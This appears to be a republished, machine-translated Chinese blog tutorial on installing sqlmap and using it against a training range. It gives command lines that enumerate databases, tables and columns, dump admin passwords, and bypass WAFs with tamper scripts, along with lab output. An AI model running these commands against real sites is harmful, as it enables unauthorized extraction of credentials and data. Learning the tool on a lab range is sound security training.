当前位置:网站首页>Installation and use of SQL map
Installation and use of SQL map
2022-04-22 05:24:00 【A clever lamb】
sqlmap install
sqlmap Installation package
link :https://pan.baidu.com/s/1bzR7IC6tSUgZ0bdmAxvk5g
Extraction code :0wc5
sqlmap The command of
link :https://pan.baidu.com/s/1dFWS2esURBBIH6WIhG8bgA
Extraction code :dltg
In the installation sqlmap Before you install python Environmental Science
python Installation package
link :https://pan.baidu.com/s/1tifkYDC2KIVqxGEOhbs3ug
Extraction code :e0n5
Install well python After the environment , take sqlmap Files in python In the directory of

View directory


Input sqlmap command , function sqlmap

installation is complete !
sqlmap Use
The shooting range of fengshentai is used here http://rhiq8003.ia.aqlab.cn/?id=1
demonstration
command :-u, effect : Identify target sites .
Usage method :python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1"
command :--dump, effect : Check data .
Usage method :python sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" --dump
Echo appears Parameter Indicates that there is a vulnerability in the website

Basic commands
command :-h, effect : view help . Usage method :python sqlmap.py -h
command :-u, effect : Identify target sites . Usage method :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1”
command :-r , effect : Identify target sites . Usage method :python sqlmap.py -r 1.txt
command :–data, effect : Determining parameters .python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1&pid=2&ssid=3” --data=“pid=2&ssid=3”
ps: When you manually test the website , Identify a vulnerability in a parameter . Improve the efficiency of infiltration .
ps: Parameter by parameter deletion method . Parameters are deleted one by one , Can find 【 influence 】 Website parameters . So this parameter , It is likely to be the parameter to be tested .
command :–dbs , effect : Query database name related data . Usage method :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dbs
[] information_schema
[] maoshe
[*] test
command :-D, effect : Specify database .↓↓↓↓ A combination of ↓↓↓↓
command :–tables, effect : Query all table names . Usage method :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe --tables
|admin |
| dirs |
| news |
| xss |
ps: The structure of the database : library 、 surface 、 Column 、 data
command :-T, effect : Specified table name .
command :–columns, View all column names . Usage method :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe -T admin --columns
| Id | int(11) |
| password | varchar(11) |
| username | varchar(11)
command :-C , Total use : Specifies the column name .↓↓↓↓ A combination of ↓↓↓↓
command :–dump, effect : Check data . Usage method :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” -D maoshe -T admin -C password --dump
ps: Prison orders
password |
| hellohack |
| zkaqbanban |
Usage method :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --dump
Advanced command
command :–proxy, effect : Using agents . Use the syntax :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --proxy=“http://127.0.0.1:8080/”
command :–random-agent , effect : change UA. Use the syntax :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --proxy=“http://127.0.0.1:8080/” --random-agent
command :–cookie, effect : Use the website identity to scan the website . Use the syntax :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --cookie=“A=14; jwt_id=10225;”
Use -r, You don't have to –cookie
command :–level , effect : Improve scanning intensity . Default 1
command :–risk , effect : Raise the risk level . Default 1
Use the syntax :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --level 3 --risk 2
command :–batch , effect : Default choice , Automatic judgment ..python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --batch
Y/N
command :–tamper, effect : Use scripts , Bypass IPS、WAF etc. . Usage method :python sqlmap.py -u “http://rhiq8003.ia.aqlab.cn/?id=1” --tamper=“tamper/between.py,tamper/randomcase.py”
ps: In most cases, it doesn't work .
Personal requirements :
1. Master winding WAF Methods .—> https://bbs.zkaq.cn/t/6205.html
2. Master writing python Script . --> self-taught
ps: The main information of this article comes from Mr. Jess who controls safety !
版权声明
本文为[A clever lamb]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204210619528600.html
边栏推荐
- Von Neumann architecture
- Summary of browser cross domain problems
- 数据库(二)MySQL表的增删改查(基础)
- 物联网测试都有哪些挑战,软件检测机构如何保证质量
- Nodejs link redis
- Delete Xunlei and see the uninstall residue in the folder right-click menu
- Status mode (4.4-4.10)
- Three paging query methods of SQL Server
- 13.9.1-PointersOnC-20220421
- Send a shutdown command to the LAN computer every 30 seconds
猜你喜欢

IO流..

MySQL数据库第十一次

Apache poi HSSF operation Excel

One way to disable Google cross domain

Leetcode 1557. Minimum number of vertices to reach all nodes

Generic types in classes and generic types

Visitor mode from 2022-1-3 to 2022-1-16
![[WPF] customize combobox](/img/99/21298293139f6acb9d0144236b825e.png)
[WPF] customize combobox

Neural network -- basic idea

Auto.js 画布设置防锯齿paint.setAntiAlias(true);
随机推荐
【Redis笔记】数据结构和对象:字典
MySQL数据库第十一次
Onzième emploi dans la base de données MySQL - application de la vue
Basic concepts of outh2
Delete Xunlei and see the uninstall residue in the folder right-click menu
Time complexity and space complexity
Go语言爬虫基础
IT配电及防火限流式保护器应用及选型
Shenzhen Xishuangbanna
【CANdelaStudio编辑CDD】-2.3-实现$27服务多个SecurityLevel之间的跳转(UDS诊断)
我的创作纪念日
时间复杂度和空间复杂度
Codeforces Round #781 (Div. 2) ABCD
How to dynamically load parameters, pictures and background pictures for RDLC printing reports of ReportViewer
Three paging query methods of SQL Server
The eleventh job of MySQL database - Application of view
Apache poi HSSF operation Excel
C LINQ's group, count, sum, write it down
Intermediary model (3.28-4.3)
Mengxin sees the recruitment of volunteers in the open source community of wedatasphere